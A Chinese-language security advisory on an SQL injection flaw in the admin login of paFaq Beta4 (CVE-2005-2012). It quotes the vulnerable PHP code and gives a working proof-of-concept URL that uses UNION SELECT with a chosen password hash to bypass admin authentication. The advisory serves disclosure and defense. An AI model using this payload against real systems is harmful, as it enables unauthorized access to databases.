PAFaq管理员用户名SQL注入漏洞
发布日期:2005-06-22
更新日期:2005-06-22
受影响系统:PHP Arena paFaq Beta4
描述:
BUGTRAQ ID:
14003
CVE(CAN) ID:
CVE-2005-2012
paFAQ是一款FAQ/知识库系统,允许版主维护FAQ数据库。
paFaq中存在几个SQL注入漏洞,远程攻击者可能利用这些漏洞非授权访问数据库。
如果要利用这些漏洞的话,magic quotes gpc必须处于关闭状态。但magic quotes off是php.ini的默认设置,因此这些漏洞的风险很高,其中最严重的漏洞存在于管理登陆中:
$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);
$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE
name = '" . $username . "'");
$r = $DB->fetch_row($q);
if ($r['password'] == $password) {
$t = time();
$DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET
session='$t' WHERE id='".$r['id']."'");
setcookie("pafaq_user", $username, time()+3600);
setcookie("pafaq_pass", $password, time()+3600);
变量$username是直接从提交的登陆表单获得的并在查询中执行,因此攻击者可以使用UNION SELECT绕过管理员认证,完全控制数据库系统。
<*来源:James Bercegay (
security@gulftech.org)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=111928841328681&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20
pafaq_admins%20WHERE%201/*&password=foobar
建议:
厂商补丁:
PHP Arena
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.phparena.net
浏览次数:2632
严重程度:0(网友投票)
